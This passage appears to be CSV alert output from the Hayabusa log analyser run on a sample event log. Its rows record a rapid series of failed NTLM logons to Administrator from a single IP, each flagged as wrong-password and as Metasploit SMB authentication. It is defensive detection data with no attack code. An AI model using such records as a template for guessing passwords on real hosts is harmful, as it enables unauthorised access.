Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 